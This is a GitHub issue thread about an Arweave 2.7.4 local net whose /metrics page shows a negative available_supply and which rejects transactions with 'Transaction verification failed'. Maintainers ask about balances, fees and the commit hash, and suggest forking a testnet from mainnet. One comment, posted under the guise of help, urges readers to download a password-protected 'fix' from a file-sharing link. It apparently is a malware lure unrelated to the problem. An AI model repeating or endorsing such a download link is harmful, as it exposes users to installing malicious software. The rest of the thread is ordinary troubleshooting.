### ISSUE TITLE
local net /metrics page shows available_supply is below zero, and cannot upload files.

### ISSUE THREAD

**Issue by techinged** [ArweaveTeam/arweave#608]
![image](https://github.com/user-attachments/assets/1b8f1c24-37f6-497c-bdbc-7b95ba08ed2e)
![image](https://github.com/user-attachments/assets/b55378bc-0ef3-43a6-9c73-c8a3e56ee732)
![image](https://github.com/user-attachments/assets/18f9f670-1d56-4e1d-b716-87f6ac047360)
<img width="868" alt="e0a1dec833d3eb2ca7f98ad9525f82f" src="https://github.com/user-attachments/assets/370bc654-e233-498a-852d-ee9d393bc3e1">

The version of Arweave is 2.7.4. 

@vird 
Hi Vird, I encounter a new problem. I depolyed a local net. In the beginning, I could upload and download files to/from the local net. But after some time, I failed to upload files using arweave-js, saying 'Unable to upload transaction: 400, Transaction verification failed.'. The screenshots are as the above. 
Thanks.

**Comment by vird** [comment]
I don't know what's wrong with setup (including negative available_supply)
But at least for 400
1. What is your balance?
2. What is fee for transaction? (You can log transaction after arweave.createTransaction or after arweave.transactions.sign)
3. What is price from your node http://IP:1984/price/<your amount in bytes> ?

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by techinged** [comment]
![image](https://github.com/user-attachments/assets/6b9a7c71-4a3a-4cff-9043-7276919e5bbf)


> I don't know what's wrong with setup (including negative available_supply) But at least for 400
> 
> 1. What is your balance?
> 2. What is fee for transaction? (You can log transaction after arweave.createTransaction or after arweave.transactions.sign)
> 3. What is price from your node http://IP:1984/price/ ?

<img width="356" alt="1724744933151" src="https://github.com/user-attachments/assets/0c40c864-2188-4928-9ad4-893ea2ed2f35">

The balance of my wallet is AR 999856749260888.646472321380

@vird 
Please see the above.

**Comment by techinged** [comment]
> I don't know what's wrong with setup (including negative available_supply) But at least for 400
> 
> 1. What is your balance?
> 2. What is fee for transaction? (You can log transaction after arweave.createTransaction or after arweave.transactions.sign)
> 3. What is price from your node http://IP:1984/price/ ?

<img width="356" alt="1724745104307" src="https://github.com/user-attachments/assets/e09e85e8-d4f1-4672-8fb1-ec0156828594">

The balance of the wallet is 999856749260888.646472321380 AR. 

@vird 
Please see the above.

**Comment by vird** [comment]
262228144429722289445 > 99856749260888
So transaction is not valid because you don't have enough balance

**Comment by techinged** [comment]
> 262228144429722289445 > 99856749260888 So transaction is not valid because you don't have enough balance

How to avoid this problem for local net?

**Comment by techinged** [comment]
> > I don't know what's wrong with setup (including negative available_supply) But at least for 400
> > 
> > 1. What is your balance?
> > 2. What is fee for transaction? (You can log transaction after arweave.createTransaction or after arweave.transactions.sign)
> > 3. What is price from your node http://IP:1984/price/ ?
> 
> <img alt="1724745104307" width="356" src="https://private-user-images.githubusercontent.com/59682314/361706712-e09e85e8-d4f1-4672-8fb1-ec0156828594.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NDU0ODksIm5iZiI6MTcyNDc0NTE4OSwicGF0aCI6Ii81OTY4MjMxNC8zNjE3MDY3MTItZTA5ZTg1ZTgtZDRmMS00NjcyLThmYjEtZWMwMTU2ODI4NTk0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDA3NTMwOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWMyOWU5NzRiNDliOGRlOWI0YzcyZDYwNzcxOGViZTM0YjAzODRjYjJhZGY0YTg5NWE0NWE5ZGQ4YTJhOTk5YzImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.JFmHuBuKoF1kr2vQR021rJVOOK5vx8xIGVoN_PEWQ2w">
> The balance of the wallet is 999856749260888.646472321380 AR.
> 
> @vird Please see the above.

@vird 

262228144429722289445 means winston? It's about 262228144 AR. 
999856749260888.646472321380 > 262228144, the balance is enough.

**Comment by vird** [comment]
Yeah, sorry. Balance is enough
I have no idea
Maybe there is no IP:1984 specified, so it tries to submit tx to arweave.net?

**Comment by techinged** [comment]
> Yeah, sorry. Balance is enough I have no idea Maybe there is no IP:1984 specified, so it tries to submit tx to arweave.net? Can you specify code what you use?

@vird 
The code doesn't change. The same code can upload big files to the local net, and I can also download them from it then. But after some time, the code doesn't work, and fails to upload files to the local net.

**Comment by techinged** [comment]
<img width="421" alt="1724746782219" src="https://github.com/user-attachments/assets/167ea72e-e1d5-49c9-b0c3-71ac7ba5fa84">
@vird 
available_supply is below zero. Does it mean something goes wrong?

**Comment by techinged** [comment]
> Did you tried to restart localnet? How much blocks from start localnet you failed first time?

@vird 
I didn't restart localnet. I'll restart it.  The problem  occured at block height 8027

**Comment by techinged** [comment]
> > Did you tried to restart localnet? How much blocks from start localnet you failed first time?
> 
> @vird I didn't restart localnet. I'll restart it. The problem occured at block height 8027

@vird 
I restarted localnet just now, but the problem still exists.

**Comment by techinged** [comment]
> What commit hash do you use?

root@node1:/opt/arweave/git/arweave# git log --oneline --branches
55dbf975 (HEAD -> master, tag: N.2.7.4, origin/master, origin/HEAD) Add benchmark-hash to the release
5f941fb5 Release 2.7.4
3f3993bd Update testnet config for 2.7.4 validation

@vird 
Please see the above.   55dbf975

**Comment by vird** [comment]
Is sending money to other address also not functioning? With same error?

**Comment by techinged** [comment]
> Is sending money to other address also not functioning? With same error?

@vird 
Yes, all transactions don't work.

**Comment by JamesPiechota** [comment]
in general localnet is not a set-it-and-forget-it tool - the main usage it gets is as part of automated test suites that are not left running, but rather are reset frequently. As a result there are many use cases that won't work well or at all. 

Depending on what you're trying to achieve I'd recommend running a testnet that forks off mainnet. There's some explanation here: https://github.com/ArweaveTeam/arweave/blob/master/rebar.config#L417

The basic process is:
1. run a regular node on mainnet until it can sync all the local state data it needs (maybe run it for a few hours)
2. stop the node and then restart it as a testnode following the instructions linked above. You should start from a block heigh ending in 9 to ensure that the difficulty gets adjusted downward from the mainnet difficulty.
3. Once your pilot node is running connect to it from other nodes.

**Comment by shizzard** [comment]
@techinged can you please come up with the steps you did to spin up the localnet?

**Comment by techinged** [comment]
> spin up

@JamesPiechota 
Thanks a lot.  'start from a block heigh ending in 9', how to do that? 
`bin/start start_from_block_index data_dir /opt/arweave/arx/data/ port 1984  mining_addr O2t2ASJX8mkqRhcvpFZdclhNT6lFNIRKir8--X_OrtY storage_module 0,unpacked storage_module 0,O2t2ASJX8mkqRhcvpFZdclhNT6lFNIRKir8--X_OrtY mine`, this command means continue mining? What command to start from a block heigh ending in 9?

**Comment by techinged** [comment]
> in general localnet is not a set-it-and-forget-it tool - the main usage it gets is as part of automated test suites that are not left running, but rather are reset frequently. As a result there are many use cases that won't work well or at all.
> 
> Depending on what you're trying to achieve I'd recommend running a testnet that forks off mainnet. There's some explanation here: https://github.com/ArweaveTeam/arweave/blob/master/rebar.config#L417
> 
> The basic process is:
> 
> 1. run a regular node on mainnet until it can sync all the local state data it needs (maybe run it for a few hours)
> 2. stop the node and then restart it as a testnode following the instructions linked above. You should start from a block heigh ending in 9 to ensure that the difficulty gets adjusted downward from the mainnet difficulty.
> 3. Once your pilot node is running connect to it from other nodes.

@vird 
Hi vird, JamesPiechota's suggestions mean that I sync data from mainet for a few hours, then I use those data to launch localnet starting mining from block height 9 (abandon the block data after height 9 synced from mainet). Do I understand JamesPiechota's suggestions correctly?

**Comment by techinged** [comment]
> in general localnet is not a set-it-and-forget-it tool - the main usage it gets is as part of automated test suites that are not left running, but rather are reset frequently. As a result there are many use cases that won't work well or at all.
> 
> Depending on what you're trying to achieve I'd recommend running a testnet that forks off mainnet. There's some explanation here: https://github.com/ArweaveTeam/arweave/blob/master/rebar.config#L417
> 
> The basic process is:
> 
> 1. run a regular node on mainnet until it can sync all the local state data it needs (maybe run it for a few hours)
> 2. stop the node and then restart it as a testnode following the instructions linked above. You should start from a block heigh ending in 9 to ensure that the difficulty gets adjusted downward from the mainnet difficulty.
> 3. Once your pilot node is running connect to it from other nodes.

@vird
Hi vird, JamesPiechota's suggestions mean that I sync data from mainnet for a few hours, then I use those data to launch localnet starting mining from block height 9 (abandon the block data after height 9 synced from mainet). Do I understand correctly?

**Comment by techinged** [comment]
> > in general localnet is not a set-it-and-forget-it tool - the main usage it gets is as part of automated test suites that are not left running, but rather are reset frequently. As a result there are many use cases that won't work well or at all.
> > Depending on what you're trying to achieve I'd recommend running a testnet that forks off mainnet. There's some explanation here: https://github.com/ArweaveTeam/arweave/blob/master/rebar.config#L417
> > The basic process is:
> > 
> > 1. run a regular node on mainnet until it can sync all the local state data it needs (maybe run it for a few hours)
> > 2. stop the node and then restart it as a testnode following the instructions linked above. You should start from a block heigh ending in 9 to ensure that the difficulty gets adjusted downward from the mainnet difficulty.
> > 3. Once your pilot node is running connect to it from other nodes.
> 
> @vird Hi vird, JamesPiechota's suggestions mean that I sync data from mainnet for a few hours, then I use those data to launch localnet starting mining from block height 9 (abandon the block data after height 9 synced from mainnet). Do I understand correctly?

@JamesPiechota

**Comment by techinged** [comment]
resolved this issue with other method.
